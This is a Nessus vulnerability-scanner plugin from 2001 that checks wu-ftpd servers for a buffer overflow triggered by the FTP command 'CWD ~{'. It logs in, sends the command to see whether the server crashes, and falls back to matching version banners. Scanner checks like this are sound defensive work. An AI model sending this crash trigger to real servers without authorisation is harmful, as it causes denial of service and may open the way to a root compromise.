#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
# 
#
# See the Nessus Scripts License for details
#
#
# Reference : http://archives.neohapsis.com/archives/vuln-dev/2001-q2/0311.html
# (thanks to MaXX for pointing it out :)
# 
bracket = raw_string(0x7B);

if(description)
{
 script_id(10813);
 
 name["english"] = string("wu-ftpd mishandles CWD ~", bracket);
 
 script_name(english:name["english"]);
	     
 desc["english"] = "
It was possible to make the remote FTP server crash
by sending the command 'CWD ~"+bracket+"'.

It is very likely that an attacker can use this
flaw to execute arbitrary code on the remote 
server, thus obtaining a root shell on
this system.

Solution : upgrade your FTP server.
Risk factor : High";
		 
 script_description(english:desc["english"]);
		    
 
 script_summary(english:"Checks if the remote ftp can be buffer overflown",
 		francais:"Dtermine si le serveur ftp distant peut etre soumis a un dpassement de buffer");
 script_category(ACT_ATTACK); 
 script_family(english:"FTP");
 script_family(francais:"FTP");
 
 script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
 		  francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
		  
 script_dependencie("find_service.nes", "ftp_anonymous.nasl");
 script_require_keys("ftp/login");
 script_require_ports("Services/ftp", 21);
 exit(0);
}

#
# The script code starts here : 
#




# First, we need access
login = get_kb_item("ftp/login");
password = get_kb_item("ftp/password");


port = get_kb_item("Services/ftp");
if(!port)port = 21;


banner = get_kb_item(string("ftp/banner/", port));


if(login)
{
# Connect to the FTP server
soc = open_sock_tcp(port);
if(soc)
{
 if(ftp_log_in(socket:soc, user:login, pass:password))
 {
     # We are in
     c = string("CWD ~", bracket, "\r\n");
     send(socket:soc, data:c);
     b = recv(socket:soc, length:1024);
     if(!b)security_hole(port);
     else {
     quit = string("QUIT\r\n");
     send(socket:soc, data:quit);
     close(soc);
     }
    exit(0);
   }
  }
 }


if(!banner)
{ 
 soc = open_sock_tcp(port);
 banner = recv_line(socket:soc, length:4096);
}




if(banner)
{
  # wu-ftpd 2.6.1-20 is not vulnerable
 if(ereg(pattern:".*wu-2\.6\.1-[2-9][0-9].*", string:banner))exit(0);



 if(ereg(pattern:".*wu-([0-1]|(2\.([0-5][^0-9]|6\.0))).*$",string:banner)||
    ereg(pattern:".*wu-2\.6\.1.*", string:banner))
 {

 		report = 
string("It may be possible to make the remote FTP server crash\n",
"by sending the command 'CWD ~",bracket,"'.\n\n",
"It is very likely that an attacker can use this\n",
"flaw to execute arbitrary code on the remote\n",
"server, thus obtaining a root shell on this system\n",
"*** Warning : we could not verify this vulnerability. Nessus\n",
"*** just relied on the banner of this server\n\n",				     
"Solution : upgrade to the latest version of  wu-ftpd server\n",
"Risk factor : High");
  		security_hole(port:port, data:report);
   }
}
